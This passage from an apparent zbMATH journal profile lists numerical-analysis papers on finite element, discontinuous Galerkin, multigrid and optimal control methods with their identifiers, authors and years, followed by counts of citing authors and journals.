Matlab. Zbl 1099.74544 Carstensen, C.; Klose, R. 2002 Higher order Galerkin time discretizations and fast multigrid solvers for the heat equation. Zbl 1218.65107 Hussain, S.; Schieweck, F.; Turek, S. 2011 Mathematical study of multispecies dynamics modeling predator-prey spatial interactions. Zbl 1364.35147 2017 Convergence analysis of an adaptive edge finite element method for the 2D eddy current equations. Zbl 1073.78008 Carstensen, C.; Hoppe, R. H. W. 2005 Regularity estimates for elliptic boundary value problems with smooth data on polygonal domains. Zbl 1050.65108 Bacuta, C.; Bramble, J. H.; Xu, J. 2003 A posteriori error estimates for adaptive finite element discretizations of boundary control problems. Zbl 1104.65066 Hoppe, R. H. W.; Iliash, Y.; Iyyunni, C.; Sweilam, N. H. 2006 Local error analysis of the interior penalty discontinuous Galerkin method for second order elliptic problems. Zbl 1022.65123 Kanschat, G.; Rannacher, R. 2002 Higher-order relaxation schemes for hyperbolic systems of conservation laws. Zbl 1084.65076 Banda, M. K.; Seaid, M. 2005 Convergence analysis and error estimates for mixed finite element method on distorted meshes. Zbl 1069.65114 Kuznetsov, Yu.; Repin, S. 2005 A posteriori error estimation of goal-oriented quantities by a superconvergence patch recovery. Zbl 1039.65075 Korotov, S.; Neittaanmäki, P.; Repin, S. 2003 Pressure-robust analysis of divergence-free and conforming FEM for evolutionary incompressible Navier-Stokes flows. Zbl 1388.76151 Schroeder, Philipp W.; Lube, Gert 2017 Convergence analysis of finite element methods for $$H(\mathrm{div};\Omega )$$-elliptic interface problems. Zbl 1203.65227 Hiptmair, R.; Li, J.; Zou, J. 2010 Efficient MHD Riemann solvers for simulations on unstructured triangular grids. Zbl 1037.76038 Wesenberg, M. 2002 Distributed optimal control of lambda-omega systems. Zbl 1104.65063 Borzì, A.; Griesse, R. 2006 Unified edge-oriented stabilization of nonconforming FEM for incompressible flow problems: numerical investigations. Zbl 1219.76030 Turek, S.; Ouazzi, A. 2007 Analysis of the Scott-Zhang interpolation in the fractional order Sobolev spaces. Zbl 1457.65190 Ciarlet, P. jun. 2013 Multiharmonic finite element analysis of a time-periodic parabolic optimal control problem. Zbl 1284.65078 Langer, U.; Wolfmayr, M. 2013 Convergence and stability of finite element modified method of characteristics for the incompressible Navier-Stokes equations. Zbl 1120.76038 El-Amrani, M.; Seaid, M. 2007 Adaptive finite element analysis of nonlinear problems: balancing of discretization and iteration errors. Zbl 1267.65184 Rannacher, R.; Vihharev, J. 2013 Approximating eigenvalues of discontinuous problems by sampling theorems. Zbl 1160.65039 Annaby, M. H.; Asharabi, R. M. 2008 Preconditioning methods for eddy-current optimally controlled time-harmonic electromagnetic problems. Zbl 1428.65040 Axelsson, Owe; Lukáš, Dalibor 2019 Error analysis for a monolithic discretization of coupled Darcy and Stokes problems. Zbl 1302.76101 Girault, V.; Kanschat, G.; Rivière, B. 2014 A scenario for symmetry breaking in Caffarelli-Kohn-Nirenberg inequalities. Zbl 1267.65075 Dolbeault, J.; Esteban, M. J. 2012 Optimality of local multilevel methods on adaptively refined meshes for elliptic boundary value problems. Zbl 1194.65147 Xu, X.; Chen, H.; Hoppe, R. H. W. 2010 Exponential decay of a finite volume scheme to the thermal equilibrium for drift-diffusion systems. Zbl 1376.82105 Bessemoulin-Chatard, Marianne; Chainais-Hillairet, Claire 2017 A variable order wavelet method for the sparse representation of layer potentials in the non-standard form. Zbl 1063.65133 Tausch, J. 2004 A least-squares approximation method for the time-harmonic Maxwell equations. Zbl 1126.78016 Bramble, J. H.; Kolev, T. V.; Pasciak, J. E. 2005 Optimized Schwarz methods for unsymmetric layered problems with strongly discontinuous and anisotropic coefficients. Zbl 1092.65112 Gerardo-Giorda, L.; Nataf, F. 2005 Local analysis of discontinuous Galerkin methods applied to singularly perturbed problems. Zbl 1099.65108 Guzmán, J. 2006 Cell centred discretisation of non linear elliptic problems on general multidimensional polyhedral grids. Zbl 1179.65138 Eymard, R.; Gallouët, T.; Herbin, R. 2009 On the convergence of Halley’s method for simultaneous computation of polynomial zeros. Zbl 1328.65110 Proinov, Petko D.; Ivanov, Stoil I. 2015 A fully-mixed finite element method for the Navier-Stokes/Darcy coupled problem with nonlinear viscosity. Zbl 1367.65167 Caucao, Sergio; Gatica, Gabriel N.; Oyarzúa, Ricardo; Šebestová, Ivana 2017 A parallel Crank-Nicolson finite difference method for time-fractional parabolic equation. Zbl 1302.65237 Sweilam, N. H.; Moharram, H.; Moniem, N. K. Abdel; Ahmed, S. 2014 Functional a posteriori error estimates for problems with nonlinear boundary conditions. Zbl 1146.65054 Repin, S.; Valdman, J. 2008 Numerical approximation of the spectra of non-compact operators arising in buckling problems. Zbl 1099.74545 Dauge, M.; Suri, M. 2002 On sinc quadrature approximations of fractional powers of regularly accretive operators. Zbl 07089643 Bonito, Andrea; Lei, Wenyu; Pasciak, Joseph E. 2019 Analysis of two-scale finite volume element method for elliptic problem. Zbl 1067.65124 Ginting, V. 2004 $$L_{2}$$ error estimates for a nonstandard finite element method on polyhedral meshes. Zbl 1222.65119 Hofreither, C. 2011 Angles between subspaces and their tangents. Zbl 1286.65052 Zhu, Peizhen; Knyazev, A. V. 2013 On improvement of the iterated Galerkin solution of the second kind integral equations. Zbl 1088.65115 Kulkarni, R. P. 2005 On a discrete Hessian recovery for $$P_1$$ finite elements. Zbl 1010.65009 Agouzal, A.; Vassilevski, Yu. 2002 Space-time finite element approximation of parabolic optimal control problems. Zbl 1250.65083 Gong, W.; Hinze, M.; Zhou, Z. J. 2012 Hierarchical Cholesky decomposition of sparse matrices arising from curl-curl equation. Zbl 1135.65015 Ibragimov, I.; Rjasanow, S.; Straube, K. 2007 An augmented Lagrangian approach to the numerical solution of a non-smooth eigenvalue problem. Zbl 1169.65064 Caboussat, A.; Glowinski, R.; Pons, V. 2009 A survey of numerical methods for convection-diffusion optimal control problems. Zbl 1294.65072 Zhou, Z. J.; Yan, N. N. 2014 Error control in $$h$$- and $$hp$$-adaptive FEM for Signorini’s problem. Zbl 1423.74919 Schröder, A. 2009 Modeling rational spline for visualization of shaped data. Zbl 1267.65019 Sarfraz, M.; Hussain, M. Z.; Hussain, M. 2013 Overlapping Schwarz domain decomposition preconditioners for the local discontinuous Galerkin method for elliptic problems. Zbl 1232.65164 Barker, A. T.; Brenner, S. C.; Sung, L.-Y. 2011 Perturbed second derivative multistep methods. Zbl 1327.65131 Ezzeddine, Ali K.; Hojjati, Gholamreza; Abdi, Ali 2015 Chebyshev spectral-collocation method for a class of weakly singular Volterra integral equations with proportional delay. Zbl 1302.65279 Gu, Z.; Chen, Y. 2014 Nonconforming spectral/$$hp$$ element methods for elliptic systems. Zbl 1170.65334 Kumar, N. K.; Dutt, P. K.; Upadhyay, C. S. 2009 A connection between coupled and penalty projection timestepping schemes with FE spatial discretization for the Navier-Stokes equations. Zbl 1453.65331 Linke, Alexander; Neilan, Michael; Rebholz, Leo G.; Wilson, Nicholas E. 2017 An overlapping additive Schwarz preconditioner for boundary element approximations to the Laplace screen and Lamé crack problems. Zbl 1069.65132 Tran, T.; Stephan, E. P. 2004 Stability and convergence of mixed discontinuous finite element methods for second-order differential problems. Zbl 1045.65094 Chen, H.; Chen, Z. 2003 Estimating the control error in discretized PDE-constrained optimization. Zbl 1127.65038 Becker, R. 2006 Monotone algorithms for solving nonlinear monotone difference schemes of parabolic type in the canonical form. Zbl 1125.65078 Boglaev, I. 2006 Mesh adaptive multiple shooting for partial differential equations. I: Linear quadratic optimal control problems. Zbl 1177.65092 Hesse, H. K.; Kanschat, G. 2009 On the solutions of a class of nonlinear ordinary differential equations by the Bessel polynomials. Zbl 1238.65078 Yüzbaşi, Ş.; Şahin, N. 2012 A polynomial chaos approach to stochastic variational inequalities. Zbl 1220.65082 Forster, R.; Kornhuber, R. 2010 Adaptive finite element methods for the Laplace eigenvalue problem. Zbl 1222.65122 Hoppe, R. H. W.; Wu, H.; Zhang, Z. 2010 Error estimates for the convergence of a finite volume discretization of convection-diffusion equations. Zbl 1029.65124 Droniou, J. 2003 A multilevel precondition for generalized finite element method problems on unstructured simplicial meshes. Zbl 1156.65095 Cho, D.; Zikatanov, L. 2007 A new non-interior continuation method for second-order cone programming. Zbl 1288.65088 Tang, J.; He, G.; Fang, L. 2013 Improved discretization error estimates for first-order system least squares. Zbl 1044.65078 Manteuffel, T.; McCormick, S.; Pflaum, C. 2003 A domain decomposition algorithm for general covolume methods for elliptic problems. Zbl 1083.65111 Chou, S. H.; Huang, J. 2003 Moving meshes with freefem$$++$$. Zbl 1426.76243 Decoene, A.; Maury, B. 2012 Approximations with piece-wise constant fluxes for diffusion equations. Zbl 1241.65100 Kuznetsov, Yu. A. 2011 On the stability of the space-time discontinuous Galerkin method for the numerical solution of nonstationary nonlinear convection-diffusion problems. Zbl 1327.65168 2015 Multigrid methods for $$H^{\mathrm{div}}$$-conforming discontinuous Galerkin methods for the Stokes equations. Zbl 1330.76071 Kanschat, Guido; Mao, Youli 2015 Numerical solution of the Dirichlet problem for a Pucci equation in dimension two. Application to homogenization. Zbl 1155.65097 Caffarelli, L. A.; Glowinski, R. 2008 $$L^{\infty } (L^{2})$$-error estimates for the DGFEM applied to convection-diffusion problems on nonconforming meshes. Zbl 1171.65064 Feistauer, M.; Dolejší, V.; Kučera, V.; Sobotíková, V. 2009 Multigrid methods for stabilized nonconforming finite elements for incompressible flow involving the deformation tensor formulation. Zbl 1099.76520 Turek, S.; Ouazzi, A.; Schmachtel, R. 2002 A combined spectral element/finite element approach to the numerical solution of a nonlinear evolution equation describing amorphous surface growth of thin films. Zbl 1004.65099 Hoppe, R. H. W.; Nash, E. M. 2002 An efficient preconditioning method for state box-constrained optimal control problems. Zbl 1407.65036 Axelsson, Owe; Neytcheva, Maya; Ström, Anders 2018 Balanced-norm error estimates for sparse grid finite element methods applied to singularly perturbed reaction-diffusion problems. Zbl 1416.65464 Russell, Stephen; Stynes, Martin 2019 Stability and consistency of a finite difference scheme for compressible viscous isentropic flow in multi-dimension. Zbl 1407.65108 2018 Convergence analysis of a finite element method for second order non-variational elliptic problems. Zbl 1375.65144 Neilan, Michael 2017 On a direct approach to adaptive FE-discretisations for elliptic variational inequalities. Zbl 1060.65611 Suttmeier, F. T. 2005 Penalty finite element approximations of the stationary power-law Stokes problem. Zbl 1072.76039 Lefton, L.; Wei, D. 2003 A note on the efficient evaluation of a modified Hilbert transformation. Zbl 07347665 Steinbach, Olaf; Zank, Marco 2021 A decoupled finite element method with diferent time steps for the nonstationary Darcy-Brinkman problem. Zbl 1433.76088 Liao, Cheng; Huang, Pengzhan; He, Yinnian 2020 Overcoming the curse of dimensionality in the numerical approximation of Allen-Cahn partial differential equations via truncated full-history recursive multilevel Picard approximations. Zbl 07347658 Beck, Christian; Hornung, Fabian; Hutzenthaler, Martin; Jentzen, Arnulf; Kruse, Thomas 2020 Coupling of virtual element and boundary element methods for the solution of acoustic scattering problems. Zbl 07347659 Gatica, Gabriel N.; Meddahi, Salim 2020 The deal.II library, version 9.2. Zbl 1452.65222 Arndt, Daniel; Bangerth, Wolfgang; Blais, Bruno; Clevenger, Thomas C.; Fehling, Marc; Grayver, Alexander V.; Heister, Timo; Heltai, Luca; Kronbichler, Martin; Maier, Matthias; Munch, Peter; Pelteret, Jean-Paul; Rastak, Reza; Tomas, Ignacio; Turcksin, Bruno; Wang, Zhuoran; Wells, David 2020 Doubly-adaptive artificial compression methods for incompressible flow. Zbl 1452.65239 Layton, William; McLaughlin, Michael 2020 The deal.II library, Version 9.1. Zbl 1435.65010 Arndt, Daniel; Bangerth, Wolfgang; Clevenger, Thomas C.; Davydov, Denis; Fehling, Marc; Garcia-Sanchez, Daniel; Harper, Graham; Heister, Timo; Heltai, Luca; Kronbichler, Martin; Kynch, Ross Maguire; Maier, Matthias; Pelteret, Jean-Paul; Turcksin, Bruno; Wells, David 2019 Preconditioning methods for eddy-current optimally controlled time-harmonic electromagnetic problems. Zbl 1428.65040 Axelsson, Owe; Lukáš, Dalibor 2019 On sinc quadrature approximations of fractional powers of regularly accretive operators. Zbl 07089643 Bonito, Andrea; Lei, Wenyu; Pasciak, Joseph E. 2019 Balanced-norm error estimates for sparse grid finite element methods applied to singularly perturbed reaction-diffusion problems. Zbl 1416.65464 Russell, Stephen; Stynes, Martin 2019 Dual weighted residual error estimation for the finite cell method. Zbl 07089647 Stolfo, Paolo Di; Rademacher, Andreas; Schröder, Andreas 2019 Adapted explicit two-step peer methods. Zbl 07089644 Conte, Dajana; D&rsquo;Ambrosio, Raffaele; Moccaldi, Martina; Paternoster, Beatrice 2019 $$L^2$$-error analysis of an Isoparametric unfitted finite element method for elliptic interface problems. Zbl 1464.65177 Lehrenfeld, Christoph; Reusken, Arnold 2019 POD-ROM for the Darcy-Brinkman equations with double-diffusive convection. Zbl 1458.65125 Eroglu, Fatma G.; Kaya, Songul; Rebholz, Leo G. 2019 A flux-corrected RBF-FD method for convection dominated problems in domains and on manifolds. Zbl 1447.65030 Sokolov, Andriy; Davydov, Oleg; Kuzmin, Dmitri; Westermann, Alexander; Turek, Stefan 2019 A tight nonlinear approximation theory for time dependent closed quantum systems. Zbl 1461.81033 Jerome, Joseph W. 2019 Discontinuous Galerkin time discretization methods for parabolic problems with linear constraints. Zbl 1458.65129 Voulis, Igor; Reusken, Arnold 2019 Superconvergent discontinuous Galerkin methods for nonlinear parabolic initial and boundary value problems. Zbl 1458.65130 2019 The deal.II library, version 9.0. Zbl 1410.65363 Alzetta, Giovanni; Arndt, Daniel; Bangerth, Wolfgang; Boddu, Vishal; Brands, Benjamin; Davydov, Denis; Gassmöller, Rene; Heister, Timo; Heltai, Luca; Kormann, Katharina; Kronbichler, Martin; Maier, Matthias; Pelteret, Jean-Paul; Turcksin, Bruno; Wells, David 2018 Numerical solution of the infinite-dimensional LQR problem and the associated Riccati differential equations. Zbl 1444.65032 Benner, Peter; Mena, Hermann 2018 An efficient preconditioning method for state box-constrained optimal control problems. Zbl 1407.65036 Axelsson, Owe; Neytcheva, Maya; Ström, Anders 2018 Stability and consistency of a finite difference scheme for compressible viscous isentropic flow in multi-dimension. Zbl 1407.65108 2018 Fictitious domain method with boundary value correction using penalty-free Nitsche method. Zbl 1395.65149 Boiveau, Thomas; Burman, Erik; Claus, Susanne; Larson, Mats 2018 A contraction property of an adaptive divergence-conforming discontinuous Galerkin method for the Stokes problem. Zbl 1410.65424 Sharma, Natasha; Kanschat, Guido 2018 Mathematical and computational studies of fractional reaction-diffusion system modelling predator-prey interactions. Zbl 06899099 2018 The deal.II library, version 8.5. Zbl 1375.65148 Arndt, Daniel; Bangerth, Wolfgang; Davydov, Denis; Heister, Timo; Heltai, Luca; Kronbichler, Martin; Maier, Matthias; Pelteret, Jean-Paul; Turcksin, Bruno; Wells, David 2017 Mathematical study of multispecies dynamics modeling predator-prey spatial interactions. Zbl 1364.35147 2017 Pressure-robust analysis of divergence-free and conforming FEM for evolutionary incompressible Navier-Stokes flows. Zbl 1388.76151 Schroeder, Philipp W.; Lube, Gert 2017 Exponential decay of a finite volume scheme to the thermal equilibrium for drift-diffusion systems. Zbl 1376.82105 Bessemoulin-Chatard, Marianne; Chainais-Hillairet, Claire 2017 A fully-mixed finite element method for the Navier-Stokes/Darcy coupled problem with nonlinear viscosity. Zbl 1367.65167 Caucao, Sergio; Gatica, Gabriel N.; Oyarzúa, Ricardo; Šebestová, Ivana 2017 A connection between coupled and penalty projection timestepping schemes with FE spatial discretization for the Navier-Stokes equations. Zbl 1453.65331 Linke, Alexander; Neilan, Michael; Rebholz, Leo G.; Wilson, Nicholas E. 2017 Convergence analysis of a finite element method for second order non-variational elliptic problems. Zbl 1375.65144 Neilan, Michael 2017 Laplace inversion for the solution of an abstract heat equation without the forward transform of the source term. Zbl 1375.65129 Wu, Shu-Lin 2017 Parallel D-D type domain decomposition algorithm for optimal control problem governed by parabolic partial differential equation. Zbl 1362.65069 Zhang, Bo; Chen, Jixin; Yang, Danping 2017 Block-preconditioners for the incompressible Navier-Stokes equations discretized by a finite volume method. Zbl 1367.65050 He, Xin; Vuik, Cornelis; Klaij, Christiaan 2017 On three steps two-grid finite element methods for the 2D-transient Navier-Stokes equations. Zbl 1453.65308 Bajpai, Saumya; Pani, Amiya K. 2017 The deal.II library, version 8.4. Zbl 1348.65187 Bangerth, Wolfgang; Davydov, Denis; Heister, Timo; Heltai, Luca; Kanschat, Guido; Kronbichler, Martin; Maier, Matthias; Turcksin, Bruno; Wells, David 2016 Strong convergence of discrete DG solutions of the heat equation. Zbl 1352.65290 Girault, Vivette; Li, Jizhou; Rivière, Beatrice 2016 A direct algorithm in some free boundary problems. Zbl 1352.65168 Murea, Cornel M.; Tiba, Dan 2016 Error analysis of finite element and finite volume methods for some viscoelastic fluids. Zbl 1338.76059 Lukáčová-Medvid&rsquo;ová, Mária; Mizerová, Hana; She, Bangwei; Stebel, Jan 2016 Duality-based adaptivity in finite element discretization of heterogeneous multiscale problems. Zbl 1351.65090 Maier, Matthias; Rannacher, Rolf 2016 Sensitivity analysis of the grad-div stabilization parameter in finite element simulations of incompressible flow. Zbl 1462.65154 Neda, Monika; Pahlevani, Faranak; Rebholz, Leo G.; Waters, Jiajia 2016 Estimates of the modeling error generated by homogenization of an elliptic boundary value problem. Zbl 1337.35033 Repin, Sergey; Samrowski, Tatiana; Sauter, Stefan 2016 Curvature approximation of circular arcs by low-degree parametric polynomials. Zbl 1338.65029 Kovač, Boštjan; Žagar, Emil 2016 Qualitative analysis and numerical solution of Burgers’ equation via B-spline collocation with implicit Euler method on piecewise uniform mesh. Zbl 1339.65148 2016 Error estimates for Neumann boundary control problems with energy regularization. Zbl 1354.49060 Apel, Thomas; Steinbach, Olaf; Winkler, Max 2016 Analysis of the Chang-Cooper discretization scheme for a class of Fokker-Planck equations. Zbl 1327.35371 2015 On the convergence of Halley’s method for simultaneous computation of polynomial zeros. Zbl 1328.65110 Proinov, Petko D.; Ivanov, Stoil I. 2015 Perturbed second derivative multistep methods. Zbl 1327.65131 Ezzeddine, Ali K.; Hojjati, Gholamreza; Abdi, Ali 2015 On the stability of the space-time discontinuous Galerkin method for the numerical solution of nonstationary nonlinear convection-diffusion problems. Zbl 1327.65168 2015 Multigrid methods for $$H^{\mathrm{div}}$$-conforming discontinuous Galerkin methods for the Stokes equations. Zbl 1330.76071 Kanschat, Guido; Mao, Youli 2015 Convergence rate of some hybrid multigrid methods for variational inequalities. Zbl 1325.65168 2015 Optimal bilinear control of eddy current equations with grad-div regularization. Zbl 1321.35228 Yousept, Irwin 2015 A Newton-like method for computing deflating subspaces. Zbl 1328.65086 Demyanko, Kirill V.; Nechepurenko, Yuri M.; Sadkane, Miloud 2015 Convergence and error estimation of homotopy analysis method for some type of nonlinear and linear integral equations. Zbl 1328.65272 Hetmaniok, Edyta; Nowak, Iwona; Słota, Damian; Wituła, Roman 2015 Chebyshev polynomials and best approximation of some classes of functions. Zbl 1323.41027 Eslahchi, Mohammad R.; Dehghan, Mehdi; Amani, Sanaz 2015 Quasi-optimal convergence of AFEM based on separate marking. I. Zbl 1330.65162 Rabus, Hella 2015 Convergence analysis of an adaptive interior penalty discontinuous Galerkin method for the biharmonic problem. Zbl 1328.65237 Fraunholz, Thomas; Hoppe, Ronald H. W.; Peter, Malte 2015 Pythagorean-hodograph cycloidal curves. Zbl 1328.65053 Kozak, Jernej; Krajnc, Marjeta; Rogina, Mladen; Vitrih, Vito 2015 A relaxed splitting preconditioner for saddle point problems. Zbl 1328.65077 Li, Cui-Xia; Wu, Shi-Liang; Huang, Ai-Qun 2015 A multipoint Birkhoff type boundary value problem. Zbl 1321.65119 Costabile, Francesco A.; Napoli, Anna 2015 A nonmonotone inexact smoothing Newton-type method for $$P_{0}$$-NCP based on a parametric complementarity function. Zbl 1328.90099 Fang, Liang; Tang, Jingyong; Hu, Yunhong 2015 Finite element analysis of the stationary power-law Stokes equations driven by friction boundary conditions. Zbl 1330.76066 Djoko, Jules K.; Mbehou, Mohamed 2015 Unified error bounds for all Newton-Cotes quadrature rules. Zbl 1321.65038 2015 Quasi-optimal convergence of AFEM based on separate marking. II. Zbl 1330.65163 Rabus, Hella 2015 Error analysis for a monolithic discretization of coupled Darcy and Stokes problems. Zbl 1302.76101 Girault, V.; Kanschat, G.; Rivière, B. 2014 A parallel Crank-Nicolson finite difference method for time-fractional parabolic equation. Zbl 1302.65237 Sweilam, N. H.; Moharram, H.; Moniem, N. K. Abdel; Ahmed, S. 2014 A survey of numerical methods for convection-diffusion optimal control problems. Zbl 1294.65072 Zhou, Z. J.; Yan, N. N. 2014 Chebyshev spectral-collocation method for a class of weakly singular Volterra integral equations with proportional delay. Zbl 1302.65279 Gu, Z.; Chen, Y. 2014 A proof of the well posedness of discretized wave equation with an absorbing boundary condition. Zbl 1309.65095 Alonso-Mallo, I.; Portillo, A. M. 2014 Snapshot location by error equilibration in proper orthogonal decomposition for linear and semilinear parabolic partial differential equations. Zbl 1302.65138 Hoppe, R. H. W.; Liu, Zhuo 2014 A non-conforming composite quadrilateral finite element pair for feedback stabilization of the Stokes equations. Zbl 1303.65095 Benner, P.; Saak, J.; Schieweck, F.; Skrzypacz, P.; Weichelt, H. K. 2014 Hierarchical quadrature for multidimensional singular integrals. II. Zbl 1294.65035 Meszmer, P. 2014 A posteriori control of modelling and discretization errors for quasi periodic solutions. Zbl 1294.65091 Braack, M.; Taschenberger, N. 2014 On the best approximate ($$P,Q$$)-orthogonal symmetric and skew-symmetric solution of the matrix equation $$AXB=C$$. Zbl 1303.65031 Sarduvan, M.; Şimşek, S.; Özdemir, H. 2014 An additive subspace preconditioning method for the iterative solution of some problems with extreme contrasts in coefficients. Zbl 1309.65034 Axelsson, O. 2014 Analysis of the Scott-Zhang interpolation in the fractional order Sobolev spaces. Zbl 1457.65190 Ciarlet, P. jun. 2013 Multiharmonic finite element analysis of a time-periodic parabolic optimal control problem. Zbl 1284.65078 Langer, U.; Wolfmayr, M. 2013 Adaptive finite element analysis of nonlinear problems: balancing of discretization and iteration errors. Zbl 1267.65184 Rannacher, R.; Vihharev, J. 2013 Angles between subspaces and their tangents. Zbl 1286.65052 Zhu, Peizhen; Knyazev, A. V. 2013 Modeling rational spline for visualization of shaped data. Zbl 1267.65019 Sarfraz, M.; Hussain, M. Z.; Hussain, M. 2013 A new non-interior continuation method for second-order cone programming. Zbl 1288.65088 Tang, J.; He, G.; Fang, L. 2013 Guaranteed lower bounds of the smallest eigenvalues of elliptic differential operators. Zbl 1282.65144 Kuznetsov, Yu. A.; Repin, S. I. 2013 A class of hybrid linear multistep methods with $$A(\alpha)$$-stability properties for stiff IVPs in ODEs. Zbl 1282.65084 Okuonghae, R. I.; Ikhile, M. N. O. 2013 A parameter uniform method for singularly perturbed differential-difference equations with small shifts. Zbl 1270.65038 2013 Mixed spherical harmonic-generalized Laguerre spectral method for the Navier-Stokes equations. Zbl 1426.76516 Zhang, X.-Y. 2013 New development in freefem++. Zbl 1266.68090 Hecht, F. 2012 A staggered discontinuous Galerkin method for the convection-diffusion equation. Zbl 1300.65065 Chung, Eric; Lee, C. S. 2012 A scenario for symmetry breaking in Caffarelli-Kohn-Nirenberg inequalities. Zbl 1267.65075 Dolbeault, J.; Esteban, M. J. 2012 Space-time finite element approximation of parabolic optimal control problems. Zbl 1250.65083 Gong, W.; Hinze, M.; Zhou, Z. J. 2012 On the solutions of a class of nonlinear ordinary differential equations by the Bessel polynomials. Zbl 1238.65078 Yüzbaşi, Ş.; Şahin, N. 2012 Moving meshes with freefem$$++$$. Zbl 1426.76243 Decoene, A.; Maury, B. 2012 High performance domain decomposition methods on massively parallel architectures with freefem++. Zbl 1267.65195 Jolivet, P.; Dolean, V.; Hecht, F.; Nataf, F.; Prud&rsquo;Homme, C.; Spillane, N. 2012 Implementation of a low-order mimetic elements in freefem++. Zbl 1267.65127 Dalal, D.; Hecht, F.; Pironneau, O. 2012 Numerical approximations for singularly perturbed differential-difference BVPs with layer and oscillatory behavior. Zbl 1259.65107 2012 Solution of 2D Boussinesq systems with freefem$$++$$: the flat bottom case. Zbl 1426.76301 2012 Stabilisation yields strong convergence of macroscopic magnetisation vectors for micromagnetics without exchange energy. Zbl 1247.78051 Carstensen, C.; Praetorius, D. 2012 Fictitious domain method to model a movable rigid body in a sound wave. Zbl 1426.76271 Imbert, D.; McNamara, S. 2012 A finite element BFGS algorithm for the reconstruction of the flow field generated by vortex rings. Zbl 1426.76323 Zhang, Y.; Danaila, I. 2012 Higher order Galerkin time discretizations and fast multigrid solvers for the heat equation. Zbl 1218.65107 Hussain, S.; Schieweck, F.; Turek, S. 2011 ...and 121 more Documents all top 5 #### Cited by 2,743 Authors 21 Gatica, Gabriel N. 19 Rebholz, Leo G. 18 Chung, Tsz Shun Eric 18 Oyarzúa, Ricardo 17 Shang, Yueqiang 17 Wick, Thomas 16 Khoromskij, Boris N. 15 Burman, Erik 15 Repin, Sergeĭ Igorevich 15 Seaïd, Mohammed 15 Vohralík, Martin 14 Allaire, Grégoire 13 Axelsson, Axel Owe Holger 13 Dumbser, Michael 13 Lee, Sanghyun 12 Guillén González, Francisco M. 12 Hackbusch, Wolfgang 12 Kronbichler, Martin 12 Langer, Ulrich 11 Carstensen, Carsten 11 He, Xiaoming 11 Hou, Yanren 11 Nataf, Frédéric 11 Owolabi, Kolade Matthew 11 Wheeler, Mary Fanett 10 Bernardi, Christine 10 Dapogny, Charles 10 Feistauer, Miloslav 10 Hecht, Frédéric 10 Hoppe, Ronald H. W. 10 Linke, Alexander 10 Maday, Yvon 10 Perotto, Simona 10 Sinha, Rajen Kumar 10 Wollner, Winnifried 10 Yang, Yun-Bo 10 Yotov, Ivan 10 Zheng, Haibiao 9 Boglaev, Igor P. 9 Chacón Rebollo, Tomás 9 Dolejší, Vít 9 El-Amrani, Mofdi 9 Gander, Martin Jakob 9 Gómez Mármol, Macarena 9 Han, Daozhi 9 Heltai, Luca 9 Jiang, Yaolin 9 Jolivet, Pierre 9 Rubino, Samuele 9 Sayah, Toni 9 Schieweck, Friedhelm 9 Si, Zhiyong 9 Tyrtyshnikov, Evgeniĭ Evgen’evich 9 Wang, Xiaoming 8 Ahmed, Naveed 8 Borzì, Alfio 8 Çibik, Aytekin Bayram 8 Dolean, Victorita 8 Glowinski, Roland 8 Grigori, Laura 8 He, Yinnian 8 Heister, Timo 8 Kaya, Songul 8 Kuznetsov, Yurii Alekseevich 8 Layton, William J. 8 Matthies, Gunar 8 Mena, Hermann 8 Münch, Arnaud 8 Tavelli, Maurizio 8 Turek, Stefan 8 Valdman, Jan 7 An, Rong 7 Arndt, Daniel 7 Bacuta, Constantin 7 Bause, Markus 7 Caucao, Sergio 7 Girault, Vivette 7 Jiang, Nan 7 Kim, Hyea Hyun 7 Le Borne, Sabine 7 Lipnikov, Konstantin N. 7 Maier, Matthias Sebastian 7 Marquet, Olivier 7 Micheletti, Stefano 7 Pironneau, Olivier 7 Praetorius, Dirk 7 Rodríguez Galván, José Rafael 7 Schroder, Andreas 7 Wall, Wolfgang A. 7 Xiao, Jinyou 6 Annunziato, Mario 6 Bangerth, Wolfgang 6 Bhrawy, Ali Hassan 6 Brenner, Susanne Cecelia 6 Bukač, Martina 6 Chen, Yanping 6 Choo, Jinhyun 6 Colmenares, Eligio 6 Davydov, Denis 6 Dolbeault, Jean ...and 2,643 more Authors all top 5 #### Cited in 237 Journals 112 Journal of Computational and Applied Mathematics 109 Computer Methods in Applied Mechanics and Engineering 102 Journal of Computational Physics 101 Journal of Scientific Computing 97 Computers & Mathematics with Applications 74 Applied Numerical Mathematics 69 Numerische Mathematik 66 SIAM Journal on Scientific Computing 63 Applied Mathematics and Computation 47 Journal of Fluid Mechanics 44 SIAM Journal on Numerical Analysis 40 Mathematics of Computation 37 European Series in Applied and Industrial Mathematics (ESAIM): Mathematical Modelling and Numerical Analysis 34 Numerical Methods for Partial Differential Equations 31 Numerical Algorithms 29 Journal of Numerical Mathematics 23 Computational Optimization and Applications 22 Journal of Mathematical Analysis and Applications 22 Calcolo 22 Computational Methods in Applied Mathematics 19 Advances in Computational Mathematics 17 Mathematics and Computers in Simulation 16 Computers and Fluids 16 Inverse Problems 15 BIT 15 International Journal for Numerical Methods in Engineering 15 M$$^3$$AS. Mathematical Models & Methods in Applied Sciences 13 Computational Mechanics 13 Computational Geosciences 12 Computing 12 Numerical Functional Analysis and Optimization 12 Computational and Applied Mathematics 12 Comptes Rendus. Mathématique. Académie des Sciences, Paris 11 Mathematical Methods in the Applied Sciences 11 Applications of Mathematics 11 Applied Mathematical Modelling 10 Engineering Analysis with Boundary Elements 10 Multiscale Modeling & Simulation 9 SIAM Journal on Control and Optimization 9 International Journal of Computer Mathematics 9 SIAM Journal on Applied Mathematics 9 Journal of Applied Mathematics and Computing 8 Applicable Analysis 8 ETNA. Electronic Transactions on Numerical Analysis 8 Discrete and Continuous Dynamical Systems. Series B 8 S$$\vec{\text{e}}$$MA Journal 7 ZAMP. Zeitschrift für angewandte Mathematik und Physik 7 Journal of Optimization Theory and Applications 7 SIAM Journal on Matrix Analysis and Applications 7 Japan Journal of Industrial and Applied Mathematics 7 Linear Algebra and its Applications 7 Numerical Linear Algebra with Applications 7 Russian Journal of Numerical Analysis and Mathematical Modelling 7 Mathematical Problems in Engineering 7 Computing and Visualization in Science 6 International Journal for Numerical Methods in Fluids 6 Inverse Problems in Science and Engineering 5 Applied Mathematics and Optimization 5 Journal of Differential Equations 5 Mathematics and Mechanics of Solids 5 European Series in Applied and Industrial Mathematics (ESAIM): Control, Optimization and Calculus of Variations 5 Acta Numerica 5 Advances in Difference Equations 5 Boundary Value Problems 5 Inverse Problems and Imaging 5 Discrete and Continuous Dynamical Systems. Series S 5 SMAI Journal of Computational Mathematics 4 Journal of Mathematical Biology 4 Chaos, Solitons and Fractals 4 Chinese Annals of Mathematics. 